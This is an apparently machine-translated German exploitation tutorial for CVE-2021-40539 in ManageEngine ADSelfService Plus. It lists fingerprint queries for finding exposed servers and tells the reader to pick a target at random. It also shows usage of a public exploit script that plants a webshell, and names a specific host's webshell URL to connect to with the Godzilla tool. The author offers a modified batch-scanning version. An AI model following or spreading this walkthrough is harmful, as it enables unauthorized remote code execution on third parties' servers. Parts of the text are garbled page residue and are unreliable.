
CVE-2021-40539:ADSelfService Plus RCE-Schwachstelle
CVE-2021-40539: ADSelfService Plus RCE-Schwachstelle
"ADSelfService" app="ZOHO-ManageEngine-ADSelfService" header="JSESSIONIDADSSP" //推荐
https://adself.66nao.com/ Schritt 2: Suchen Sie sich zufällig ein Ziel aus und testen Sie es mit dem folgenden Erkennungsskript auf Schwachstellen....
https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py Verwendung: C:\Users\26629\Desktop\CVE-2021-40539-main>python39 exploit.py usage: exploit.py [-h] -t TARGET [-w WEBSHELL] [-j JAVA_CLASS] [-s] exploit.py: error: the following arguments are required: -t/--target Schritt 3: Mit Godzilla verbinden und den Verifikationstest durchführen.... C Code kopieren 1 https://adself.66nao.com//help/admin-guide/test.jsp
Das Skript, das von GitHub heruntergeladen wird, scannt einzelne Ziele. Ich habe eine Weiterentwicklung vorgenommen und ein Modul für den Batch-Scan mit -f hinzugefügt. Ihr könnt es herunterladen und verwenden.